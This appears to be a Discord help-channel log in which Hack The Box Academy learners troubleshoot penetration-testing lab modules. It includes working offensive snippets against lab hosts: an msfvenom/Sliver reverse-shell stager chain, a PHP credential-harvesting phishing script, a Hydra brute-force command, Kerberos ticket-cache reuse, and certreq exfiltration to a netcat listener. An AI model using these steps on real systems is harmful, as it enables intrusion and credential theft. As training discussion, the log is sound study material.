hello, I have a question about sql injection module. I don't understand this. Since the AND operand is evaluated before, this does not make sense to me. Wouldn't it be the same result with '1'='2'?

shut vapor
#

I would encourage you to try. But, yeah, you're not the first one to have their mind warped by that assertion.

next stone
#

Need help with Skills Assessment - Hard in Abusing HTTP Misconfigurations module

bright pivot
next stone
#

I found the parameter for XSS, poisoned the cache but it doesn't seems to impact the verification bot, I tried to steal the session cookie and calling http://httpattacks.htb/admin/promote?uid=2 using my XSS payload but nothing works

#

on more thing how do you hide text (shown when click on the black box) here in discord?

#

@rapid fog @dapper moth @spring lily

shut vapor
# wheat blaze Why should we apply Relationship-Oriented-Questioning (ROQ) model?

So from what I understand memory works best when you're relating "things you're learning" to "things you know". Someone else may have a better answer for you, but those meta-modules are abstract so, they're very much a take from them what you will.
There was actually a great radio broadcast I caught the other week with an academic that studies how memory works upon which I'm basing this answer. If you wanted to hear more on the topic it's worth a listen and some notes:
https://hiddenbrain.org/podcast/remember-more-forget-less/

dapper moth
next stone
#

but it works locally

dapper moth
bright pivot
#

but i still cannot find the flag

dapper moth
bright pivot
#

@fathom pendant can i dm you directly?

vivid pilot
#

Finally solved

slate halo
#

Hello, can someone help how to get a reverse shell for the AEN Web Enumeration & Exploitation. The Web shell that I got after getting the creds is limited from commands and with burpsuite unable to make the correct payload

stable jasper
#

for the first time in htb i feel really lost, i'm reading the Footprinting DNS module and just can't get my head around it. someone here have some good other resources i can try to understand DNS ?

cloud urchin
#

chat gpt

#

do you know what an IP address and a hostname is?

stable jasper
stable jasper
cloud urchin
#

DNS simply resolves a hostname into an IP address

slate halo
stable jasper
old oasis
#

not that complicated

#

You could watch a video on DNS to supplement your understanding 🙂

#

sometimes you just need to go over it a couple of times

regal sigil
#

Module: AD Enumeration & Attacks - Skills Assessment Part II
Question: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I want to add a certain user to a certain group, I want to do it using powerview, but somehow it is not working correctly. I do not understand what is wrong, as the first command works the second one does not work

regal sigil
cloud urchin
#

because it's not a valid cmdlet

#

did you mean Get-DomainGroup?

regal sigil
#

did not work

regal sigil
cloud urchin
#

looks like a different error, now you're missing parameters

rustic sage
#

I'm trying to get my double pivot to work, I setup a listener and stuff but I can't get it working

stable jasper
foggy monolith
rustic sage
#

ATKBOX -> ubuntumachine -> Windows -> (internal network)

safe star
#

What tool

rustic sage
#

ligolo

#

I have my tunnel, setup my second interface, added my lisetener

#

but when I connect no new session

foggy monolith
#

Try using the 240.0.0.1 IP address and see what happens

safe star
#

Need to see pics tbh. Dm me

#

One little thing could mess it all up

rustic sage
#
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
.\agent.exe -connect INTERNAL-PIVOT-IP:11601 -ignore-cert
foggy monolith
rustic sage
#

okay trying now

safe star
#

Are you getting errors or it’s just not connecting?

rustic sage
#

just not conecting

safe star
#

It must be the ip then

dim wolf
#

which module is this

foggy monolith
#

Another thing: check your firewall settings. If you're using a local machine to attack and not the PwnBox, you could have connections being blocked, as I had to learn the hard way

rustic sage
#

these are the interfaces

ligolo: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500                                                                                                                                                [0/138]
        inet6 fe80::3185:eae8:5c78:6a8c  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 36413  bytes 7082622 (6.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28949  bytes 10454709 (9.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ligolo1: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
rustic sage
safe star
rustic sage
#

I'm gonna reset everything one sec

#

got it, thanks everyone

bright eagle
#

Hey I just joined kinda watching the show it’s crazy how much u guys support each other and u I fuckin respect that

#

Anyways I’m tryna get into hacking what some basic stuff I need and I also need a mentor I’ll pay for lessons

shut vapor
bright eagle
#

Thank you

shut vapor
#

Professionally maybe you can find yourself a mentor, but as for the technical education -- as you've brought up -- you will learn everything you need with your own reading and by learning to ask good questions of the community who is happy to help.

bright eagle
north wave
#

look @safe star idk how to import '$conn' using php

#

it's the last question

safe star
#

you read it wrong, they mean that its imported from another file

#

you have to read that imported file

north wave
#

ahh

fervent trail
#

is there mods on this servers?

gilded radish
#

are you about to drop smth?

north wave
safe star
#

idk, just check either way

acoustic owl
urban raptor
#

Any help for Advanced XSS and CSRF exploitation skills assessment? Can bypass samesite cookie restriction to the main domain but seems like it’s refusing to send with the subdomain

vague dust
#

happy sunday everyone. i had a question about the Windows Attacks and Defense regarding the Kerberoasting. when i try to connect to the kali attack box via ssh it keeps giving me a connection refused message. is there something im missing?

cloud urchin
#

probably firewall

vague dust
#

on my end or the freeRDP target ip?

cloud urchin
#

wait what attack box

#

looks like it's just a windows box isn't it?

#

use the pwnbox or your vm?

vague dust
#

pwnbox

cloud urchin
#

yeah or you can RDP into it

#

you can kerberoast from linux but this module doesn't cover it i think, just from windows

#

so you'll want to RDP into the machine with your pwnbox

vague dust
#

which i did

cloud urchin
#

so what's the issue

vague dust
#

well it asks me to share the outfile that has the results from the kerberoasting to the kali box. doesnt mention anything about pwnbox.

cloud urchin
#

if you're not using your own kali vm you can just use the pwnbox (parrot) instead

vague dust
#

ok. so basically substitute kali for pwnbox. thank you. was a little misguided on this one

cloud urchin
#

yeah. if you add /drive to your xfreerdp command you can also easily share a folder. like /drive:/home/supernuts/desktop

vague dust
#

oh my lord you made that 10x easier. thank you

cloud urchin
#

if you aren't doing it also try out /dynamic-resolution

vague dust
#

yup just tried that. i copy most of the commands that htb provides. its alot easier on the eyes now lol

lavish ember
#

Guys I need help in the Firewall and IDS/IPS Evasion - Medium Lab (Network Enumeration with Nmap)

#

I tried every possible command even commands I found on the forum

#

Nothing appears to solve it for me

#

Is this normal?

sturdy otter
lavish ember
#

Yeah I checked it

#

I literally got commands that solved it for some people yet it didnt solve it for me lol

sturdy otter
#

just checked it, works

#

did you use Options to fingerprint the Port?

#

pay close attention to the Output then

old oasis
lavish ember
#

I tried the following:
nmap -Pn -T4 -A -v -sV 10.129.57.157 -p 53 -D RND:5 --stats-every=5s
nmap -sV --version-intensity 9 -p 53 --script dns-service-discovery 10.129.2.48”
nmap 10.129.2.48 -p53 -sV -Pn -n --disable-arp-ping --packet-trace --script banner
nmap 10.129.2.48 -p53 -sS -sV -Pn -n --disable-arp-ping --packet-trace

#

I also added the -sU

shut quest
#

What part is unclear?

cobalt aspen
#

hey did anyone have a problem with server-side attacks instance, mine instance for ssrf doesnt work

dapper moth
dapper moth
lavish ember
#

Yes the answer is in this port

#

I'm sure

dapper moth
#

Of course it is

#

Try following the steps in the evasion section

#

It is the exact same thing

cobalt aspen
#
Host: 10.129.63.227
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

dateserver=http://127.0.0.1/&date=2024-01-01``` 
did exact same thing as in the identifying ssrf section, am i missing something or what?
round marten
#

is there by chance some sort of cli imap client I can easily fire up that ships with pwnbox? I've done the modules on manually accessing mail and whilst I'm glad to have learnt it, there's got to be an easier way

cloud urchin
#

netcat?

round marten
# cloud urchin netcat?

it works with openssl s_client. It just feels like there'll be some more convenient imap_all_mail_downloader.py sitting there i won't know about unless I ask.

wooden silo
#

currently on the attacking SMB module and I have the username and password of who I need to login with via SSH however I keep getting denied saying I have a public key and I never get prompted to put in a password

shut vapor
wooden silo
shut vapor
#

there's another one too, PubkeyAuth I think. It's like something I need to do once a year so I just always google it: force ssh password auth

#

or man page it. that's smart.

wooden silo
#

what do I type exactly after -o?

shut vapor
#

yea, I dunno because it's one of those arguments that takes a huge string as an argument

wooden silo
#

😭

shut vapor
#

-o BlahBlah=true,OtheRBlah=yes

#

or maybe you pass multiple -o's

#

¯_(ツ)_/¯

wooden silo
#

hmm we may be onto something here

loud dagger
#

i'm trying to do this windows lab with rdp but the windows box isn't connected to the internet lmao what do i do

cloud urchin
#

why do you need to connect it to the internet

loud dagger
#

file transfers

cloud urchin
#

can you just transfer it from your vm/pwnbox that already has internet?

loud dagger
#

no i'm trying to abuse certutil.exe but for some reason it will not connect to my vm

#

or uh
certreq

cloud urchin
#

can you ping the target

loud dagger
#

yep

#

i can rdp to the target but the remote machine is not connected to the internet

cloud urchin
#

so you can connect

#

so just map a drive and transfer that way

loud dagger
#

the point of the lab is to try to transfer files in specific ways, not just any way

cloud urchin
#

sorry really confused first you said the windows box couldn't connect to the internet, then you said it couldn't connect to your vm but you were able to rdp so it does connect.. then you wanted to file transfer, but not that way

#

still really confused as to what exactly you're trying to do

#

best to say what module and section and question you're on

loud dagger
#

file transfers - living off the land

#

ok so the way you transfer files using certreq.exe is you use it to send a POST request to a netcat listener but it won't connect to my netcat listener because it's not connected to the internet

safe star
#

everything should work fine as long as your on the vpn

#

the remote machines dont have internet

loud dagger
#

ok then i have no idea what's going on because i keep timing out every time i try to connect from the remote machine back to my kali vm

safe star
#

your kali machine can ping it right?

loud dagger
#

yeah i can rdp just fine

safe star
#

what error are u getting?

#

it might be the module tbh, ive seen some people have problems with this method too

loud dagger
#

ok looks like i got it, i just had to connect to the tun2 address on my kali vm because tun1, tun0, and eth0 weren't working

#

i assume tun2 is probably the rdp connection which would make sense

#

unless i know nothing about networking and it doesn't make sense

#

i know the 3 tuns are from openvpn

safe star
#

3 tun interfaces is kinda odd

loud dagger
#

yeah idk why i had 3

safe star
#

you should usually have only tun0

loud dagger
#

usually i do

safe star
#

yeah not sure what happened there but its solved now

loud dagger
#

will remember that

dim wolf
#

you might have multiple OpenVPN instances

#

should probably sudo killall openvpn

#

then reconnect to the VPN

cloud urchin
#

what calculac0re said... those are network adapters not services (like rdp)

final maple
#

Anyone available to give me a nudge on Broken Authentication - Skills Assessment? I have the ||username and password|| and I read that ||brute-forcing the otp|| is not the right path.

cloud urchin
final maple
cloud urchin
#

you're on the right track

lofty sparrow
#

anyone free to dm, stuck on icmp tunneling with socks section of pivoting tunneling and port forwarding

final maple
cloud urchin
#

there's not much more i can say really

lofty sparrow
#

nvm i killed my port forward by accident

cloud urchin
dim wolf
#

DM if you still need assistance

rustic sage
#

Help received, deleting the original message - as it is not related to modules

rocky estuary
#

guys my cherry tree file got corrupted please tell me there's a way to fix

river marsh
#

im running nmap but my output is looking different than the example:

 nmap --script smb-os-discovery.nse -p445 10.10.10.40

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 00:59 GMT
Nmap scan report for doctors.htb (10.10.10.40)
Host is up (0.022s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds

thats what the webpage looks like but this is my result:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:56 EDT
Nmap scan report for 10.129.121.141
Host is up (0.48s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds

so im missing the host script results. im running this on a kali vm instead of parrot that pwnbox uses. would that effect the display results?

shut wraith
#

Hello can someone help please how do u crack this "hexadecimal plaintext" that I got in the AD module from the LSA Secrets of the crackmapexec output:
INLANEFREIGHT\ACADEMY-EA-DC01$:plain_password_hex:8fb2ee679171183b03424facf77f129bd2646961989352bd4c19dc1791aac80d396afd390409971495d83cf022140052fa430dcbce392b0ce5cdb2e3000c4cbf92d592987a8e7b78e4ea302bda48e0390878d0f550efaa15966bb61810a21ca27263e4e81941e0bb8d522a0521501e052f93ed6e47d1674c4cc835395204248f6b4d13fbb680facd43089ed2790926ee34fce1da66abcd7f7fae23c277fa7b7ed4b700976c61e17d3c2e25564f74b2218935c68d42dcee6ca642de87c9cdc77c8f3c6fd7973e62b52fd23ffc3adef2ed238cfdb94b2563c0ce4422d25a48fde3c161bb8a2d57266a9545f8e44e0462a2
Please @ me if you have any idea about this . Someone said it may be a service account and then u can use an attack to get authority system ?

wooden silo
#

for this exercise "attacking email services" I managed to grab the email address and password that I needed but I cannot figure out how to log into the email address using the command line. I need to login through smtp specifically

cloud urchin
shut wraith
cloud urchin
dim wolf
#

i already told you that you can't do anything with it

next bronze
dim wolf
#

if you have that, then you should have the NT hash of the computer account

next bronze
#

either way machine account passwords are not crackable

shut wraith
cloud urchin
#

you don't

nimble flint
#

Hey guys I need your help

cloud urchin
#

go on

nimble flint
#

I need to get several video from a website I need the best quality

wooden silo
# wooden silo .

still stuck on this, logging in through telnet isn't giving me what I need

nimble flint
#

???

cloud urchin
cloud urchin
wooden silo
#

idk if it has a different name for you, this is just how it shows up for me

#

what's the email client in our pwnbox?

cloud urchin
wooden silo
cloud urchin
#

choose whatever email client you like

#

if you did the footprinting module that also shows you some ways

wooden silo
#

also the email client did not work

short sentinel
#

#cdsa Hi i am facing issue in connecting to lab for "Packet Inception, Dissecting Network Traffic With Wireshark" section.I tried RDP for lab from Pwnbox , but the lab OS shows black screen? any one has face this issue before. As far as i am concerned, no history was found in support the issue.

cloud urchin
short sentinel
wooden silo
shut quest
edgy elbow
#

Can anyone tell me what is the best way to protect my website from CSRF. Some of the options that I’ve considered (or a combination of) are below. I want to fully support older browsers as much as possible (That means not fully relying on CORS preflight, I guess). Any suggestions are much appreciated. Thanks

  • Disallow simple content types
  • Custom header
  • Double submit cookie
  • Synchronizer token pattern
icy kiln
#

hi budy did u solve it? , Im in the same spot i have the port and i try medusa but is not working.

lofty sparrow
#

anyone know how to fix this?

cobalt aspen
#

anyone to help?

lofty sparrow
cobalt aspen
#

idk why but last night it didnt want to work for 2 hours, i did the exact same things, and suddenly now it works

lofty sparrow
#

with the http server?

cobalt aspen
cobalt aspen
lofty sparrow
#

hmm idk

#

did it end up working

#

with nc?

cobalt aspen
#

yeah

lofty sparrow
#

well if it works it works

cobalt aspen
#

i think it doesnt matter for testing out ssrf, nc only listens for incoming data no matters what

cobalt aspen
lofty sparrow
autumn pilot
autumn pilot
lofty sparrow
#

yeah i checked defender and i think its disabled by default for the modules, im having a break now so ill have a look again later.

frosty tide
#

I'm doing the API Attack module on Unrestricted Resource Consumption Section. I'm a bit lost on the question
" Exploit another Unrestricted Resource Consumption vulnerability and submit the flag."
The hint say "Focus on the POST /api/v1/authentication/customers/passwords/resets/sms-otps endpoint." but I dont know what I can do with that reset

#

nvm I have solved it

rustic sage
#
┌─[us-academy-5]─[10.10.14.124]─[htb-ac-1163718@htb-sed4nrlnoa]─[~]
└──╼ [★]$ xfreerdp /u:Administrator /v:10.129.13.80 /p:AnotherC0mpl3xP4$$
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-1163718/.config/freerdp
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-1163718/.config/freerdp/certs]
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-1163718/.config/freerdp/server]
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.129.13.80:3389) 
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] -     MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.129.13.80:3389 (RDP-Server):
    Common Name: MS01.inlanefreight.htb
    Subject:     CN = MS01.inlanefreight.htb
    Issuer:      CN = MS01.inlanefreight.htb
    Thumbprint:  0c:41:a7:8d:23:e4:45:90:b3:e9:95:4b:32:ea:2c:2b:2a:ee:2b:66:d5:df:4b:21:32:6b:67:8b:51:97:aa:9b
#

is it just me encountering this on password attacks module?

#

nvm, it worked on rdesktop lol

polar latch
#

Where is the correct place to ask for help with a module?

#

I have searched previous questions and answers regarding the issue I am experiencing and others have had it as well

#

I cannot find an answer however for my issue

autumn pilot
#

this is the place

polar latch
#

ok, so I am working on Footprinting SNMP, final check using snmpwalk, snmp-check etc and I get target timeout using pwnbox or my own vpn connections, UDP or TCP

#

I have tried setting the -t25 and it does not matter

#

I have spawn 4 targets and none of them respond to those tools following demonstrated solves

#

searching for this in Discord shows I am not alone in experiencing this

autumn pilot
#

Are you using the correct community string

polar latch
#

Sorry, not using nmap brute-force script

#

I have tried that as well, it times out

#

this result is from using snmpwalk -v2c -c public -t25 -r2 <ip addr>

autumn pilot
#

works for me

polar latch
#

yeah, I think there is some other issue that I am not detecting

polar latch
#

ok, so of course it starts working now

#

zero changes in the command

bright pivot
worldly pike
#

Hello After completing a module what can you do to keep practice and increase knowledge? Pentesting job role path

autumn pilot
#

and practice

worldly pike
autumn pilot
#

yup

#

Find a way to manipulate the php code of a page

blissful chasm
#

hello i nneed help in [ Exploiting Web Vulnerabilities in Thick-Client Applications
] its my last flag

worldly pike
# autumn pilot yup

i am confused the link you gave me what for? is it for showing CTFs machine related to the module?

autumn pilot
#

right, you can practice the knowledge from the modules across machines, fortresses, prolabs etc

worldly pike
naive sage
worldly pike
autumn pilot
#

This is the right approach, select a machine, and then check out what knowledge would be required to be solved. The modules will contain the skills needed, and you can practice

old oasis
blissful chasm
#

i need help

worldly pike
#

Thank you

storm elk
viral lotus
#

when working with things like that click about and find where you can alter things, if you have never used it before get used to it as it may appear again especially in CTFs. How can you get that page to behave how you want it to.

blissful chasm
# storm elk With what

hello i nneed help in [ Exploiting Web Vulnerabilities in Thick-Client Applications
] its my last flag

rustic sage
#

Yo yo

#

On the Linux Pass the hash module

#

We can see here that we have some cache files

-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_HRJDux
-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_qMKxc6
-rw-------  1 david@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 10:43 krb5cc_647401107_O0oUWh
-rw-------  1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct  7 11:21 krb5cc_647401109_D7gVZF
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 3175 Oct  7 11:35 krb5cc_647402606
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 1433 Oct  7 11:01 krb5cc_647402606_ZX6KFA```
#

and the module wanted to use julio

#
Importing the ccache File into our Current Session
root@linux01:~# klist

klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB```

but where did this `/root/krb5cc_647401106_I8I133` came from? is that an accident
mossy drift
#

malware

icy marsh
#

got stuck in zypher initial access. any little help ?

#

#htb_pro_labs

icy marsh
#

I don't have acces to that. how do i access that chat

tender nimbus
#

Hey guys, i use onenote for my note do you know a manner for doing like a snapshot of it? We never know what cna happen and if i loose them all my work will be gone

storm elk
woeful lily
#

Hello. I need help with Repeating Requests. I am attempting to capure a flag. I'm 90% sure I've already got it, but it is not accepting my answer.

shell ore
#

make sure u submit an answer free of spaces

storm elk
shell ore
#

and dont post answers next time pls 😄

woeful lily
#

Okay, I apologize. I didn't intend any spoilers

storm elk
woeful lily
#

There are no spaces or anything. I am okay with just passing over as long as I'm not missing anything

shell ore
#

lemme check the module, 1 second

woeful lily
#

Okay, thank you

shell ore
#

what section?

woeful lily
#

Using Web Proxies

iron meadow
#

Hello, I encounter the error:
clCompileProgram(): CL_COMPILE_PROGRAM_FAILURE
error: unknown target CPU 'generic'

  • Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed

when attempting to run hashcat from the machine I'm asked to ssh into (Module : AD enumeration and attacks, section LLMNR/NBT-NS Poisoning - from Linux)

Is it a driver issue on the side of the VM?

shell ore
#

im assuming intercepting web requests?

woeful lily
#

It's under web proxies - repeating requests. It's part of the

#

Bug Bounty cert

shell ore
#

aha

#

read what the question wants from you, what you submitted was a flag for a previous section 😉

solar grove
#

SSH for Windows in Pivoting, Tunneling, and Port Forwarding room: plink.exe section, I don't quite understand what to do, where is the windows attack host?

woeful lily
#

Ah! Okay. Thank you, @shell ore ! I'll do some digging and see what I can do

dry coyote
#

Hello

storm elk
#

Hi

iron meadow
next bronze
#

always use hashcat in your host

stoic moat
#

Welcome to the problem of the first plan appears misleading

#

help me plz

storm elk
#

I’m sorry but what module are you talking about?

stoic moat
#

I don't want to subscribe to the $8 monthly plan but I can't choose it

rough phoenix
#

Hey everyone,

I’m encountering issues with Login Forms on Login Brute Forcing module and I think I’ve set everything up correctly. Here’s the Hydra command I used:

||hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 41425 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 60||

This is the output I got:
[DATA] max 60 tasks per 1 server, overall 60 tasks, 3400 login tries (l:17/p:200), ~57 tries per task
[DATA] attacking http-post-form://83.136.254.47:41425/login.php:username=^USER^&password=^PASS^:F=<form name='login'
1 of 1 target completed, 0 valid password found

Despite running the attack, no valid passwords were found. Can anyone provide some guidance or hints on what might be wrong? Any help is appreciated!

storm elk
stoic moat
#

yeas

storm elk
stoic moat
#

thank you

jaunty gull
#

What is the total cubes that will be rewarded back to you by completing it? Tier 0 Free

storm elk
#

Tier 0 = you get all cubes back

jaunty gull
#

No understand, it's question in Hack The Box

silk glade
#

Hello, in the 'MSSQL, Exchange, and SCCM Attacks' module on 'SCCM Site Takeover I' section i can not relay. It says connection refused .

jaunty gull
#

+ 2 This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?

median gale
#

Does the DOS attack disclosed here work on the exercise at the end? It prompts you to try so i figured it will, but havent managed to do it

storm elk
jaunty gull
#

Thank you, very nice

wide glacier
#

any chance you could assist me with the "Using CME Skills Assessment"
im stuck on question 2. I have gotten the A**l user and passwd, I have ran mssql queries through proxychains and outside of it just trying to enumerate more, but I think im either missing something or im not looking at the right db table... any breadcrumbs would be greately appreciated.

primal adder
#

Hello. Can someone help me with a question? I'm at Linux Fundamentals > Sytstem Information and i don't know how to answer " Which shell is specified for the htb-student user?". How do i do this? No one ever told me this, how am i supposed to know this? I looked on the internet and all the results are different and none are working.

astral inlet
#

echo $shell

primal adder
# astral inlet echo $shell

Nothing happens
Though echo $0 whatever this means displays that it's bash, but when i enter bash as answer it says incorrect

astral inlet
#

Hm weird

primal adder
#

Oh the correct answer is path to it for some reason

cosmic hornet
#

How do I get HTB Academy as cheap as possible?

cosmic hornet
#

There was a student plan, is that still available?

acoustic owl
cosmic hornet
#

Oh my student email was deleted by college, lol

wide glacier
# opal nexus check the shares

I have .. and I only have read access on all of them.. everytime I spider them, or try read into them I dont get a response other than im able to authenticate. ... I feel like im missing another user to be able to properly authenticate ..

cosmic hornet
#

Can I only use HTB for preparsion of OSCP?

wide glacier
tender nimbus
#

Hey guys can someone help? I tried to use the --ignore-certificate but it dont work

gilded pike
#

How can I start my htb journey?

tender nimbus
shut quest
compact patrolBOT
tender nimbus
#

Anyone had the same problem in the âst? First i can connect then it deconnects me nd give me this error

#

same problem on pwnbox

heavy ridge
#

Im trying to do the linux fundamentals but i cant even ping inlanefreight.com i get 0 responses

#

In the filter contents section btw

#

When i ping inlanefreight.com (134.209.24.238) i get 63 packets transmitted, 0 received, 100% packet loss, time 63825ms while using the website virtual machine

onyx dust
#

hi i want to report a bad module author

#
Obejective: To use the stager, we would need to create a profile, a stage-listener, and a stager without forgetting to generate a payload through msfvenom
The module author instructs to use msfvenom to create staged shellcode which uses port 8088 when according to the sliver documentation (https://sliver.sh/docs?name=Stagers),

"# LHOST and LPORT should correspond to the --url parameter of your stage-listener command" 
where the author's previous instruction using stage-listener implements a conflicting port, 4443. 
e.g. stage-listener --url tcp://10.10.15.107:4443 --profile htb followed by msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.107 LPORT=8088 -f aspx > sliver.aspx


The correct order for functioning callbacks would be:
profiles new --http 10.10.14.62:8088 --format shellcode htb
stage-listener --url tcp://10.10.15.107:4443 --profile htb
http -L 10.10.15.107 -l 8088 --website delivery
generate stager --lhost 10.10.15.107 --lport 4443 --format csharp --save 4443.txt
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.107 LPORT=4443 -f aspx > sliver.aspx
replace new byte from sliver.aspx with 4443.txt
upload file
..
profit: [*] Session 0587c760 LIGHT_WORKBENCH - 10.129.205.234:49680 (web01) - windows/amd64 - Mon, 07 Oct 2024 13:36:00 EDT```
#

please may i have some more QA

#

author likes to link the documentation a lot but dont follow the instructions from it when teaching.

kind jackal
#

I am not understanding how to use the command to pull up the vpn in this module, thank yu for the help in advance

shut vapor
#

but also you're trying to use an .ovpn file that doesn't exist

#

Read through the output "error ... no such file or directory"

kind jackal
shut vapor
kind jackal
#

I wanted to learn the command in case I needed it in a future module but I feel like I dont know how to use it or pull it up or even why it doesnt work, i was wanting to get soke clarity on those thougths

kind jackal
#

getting started

sacred jacinth
shut vapor
sacred jacinth
#

you will need to know how to connect using VPN when you setup a Lab of your own. As long as you are on PwnBox (the machine on cloud provided by HTB) you won't need to worry about it. Also, I believe it would be better if you focus on Information Security Path first as it provides foundations for almost every path in HTB.

kind jackal
rustic sage
#

Remmina works like charm

#

Btw guys where can I practice for eJPT (apart from the INE labs)

dreamy oyster
#

Sorry for disturbing. I am having trouble finishing a section and could use a hint.

Module: Cross-Site Scripting (XSS)
Section: XSS Attacks - Phishing

I am trying to solve the task.

  1. I started the target.
  2. I went to the URL IP/phishing and found a working payload to inject the example JS and HTML Code onto the site (adjusted with my IP where the script for fetching the credentials is running).
  3. I started the example PHP script/server
  4. I tested the connection and could retrieve the login credentials
  5. I copy and pasted the new URL into another tab and tested again -> it worked
  6. I visited the IP/phishing/send.php site and entered the URL into the input field and receive the message "Issue in sending URL!"

I tried adjusting the php script to receive POST requests. And also tried to intercept the responses with Burp and adjust the form but since I am not successfull I am either doing something wrong trying to do that or I am going further into a complete wrong direction.

I don't expect a solution. If possible just a hint, that could push me into the right direction.

old oasis
safe star
south shadow
#

Hi guys, I'm new here. Nice to meet y'all

fathom mantle
#

Hi guys, i some understand there what i need to write in a placeholer, i have a flag'

#

here i cant to send prtntscr photo?

dreamy oyster
fathom mantle
#

I have a question "As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable."

and i place in placeholder deobfuscated "code "flag='HTB { n'+'3v3r_'+'run_0'+'bfu5c'+'473d_'+'c0d3!'+' } ' "

and this answer is incorrect

old oasis
dreamy oyster
# safe star did you use the example from the module?

yes I am using the script that was shown in the module

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
dreamy oyster
fathom apex
#

hi everyone,
I'm reading the CVSS section under Vulnerability Assessment, and it mentions CVSS as "Risk Scoring".
This should be "severity rating" and not a risk-score. CVSS user guide itself mentions that it's not a risk metric. I feel this should be updated/changed.

fathom apex
safe star
south shadow
safe star
#

Have you tried any other tools?

sacred jacinth
safe star
#

Oh

sacred jacinth
#

he is afraid the police might be onto him

#

my man needs to go into hiding

safe star
#

Yeah bro is done for😵

south shadow
#

Sheesh I was scared for a second there

#

I'm changing all my notes to point to .htb

#

Idk why finalrecon example has .com. That's risky prayge

surreal lichen
#

Anyone any good with VMware I've moved over from VirtualBox since its free and my uni uses it, but the NAT doesn't seem to work, i'm constantly disconnected. With virtualbox it just worked. Trying to use the ParrotOS HTB version

safe star
south shadow
#

I'm not that far in my studies, so I had no clue. That's good to know. Thank you!

shut vapor
#

Not that I know of. Make your own as you go, it's part of the learning process. You can hit /r/oscp and youtube to hear about other people's experiences getting the cert and they may have some structure you can borrow.

steady warren
#

Hey how long does it take to complete Bug Bounty path

safe star
shut vapor
#

Totally depends on how much you already know, how much time you can dedicate to your education and how far beyond the reading material you go.

steady warren
#

Can I join CTFs without certification

shut vapor
#

yes

steady warren
#

Does CTFs provides any prize pool ??

shut vapor
#

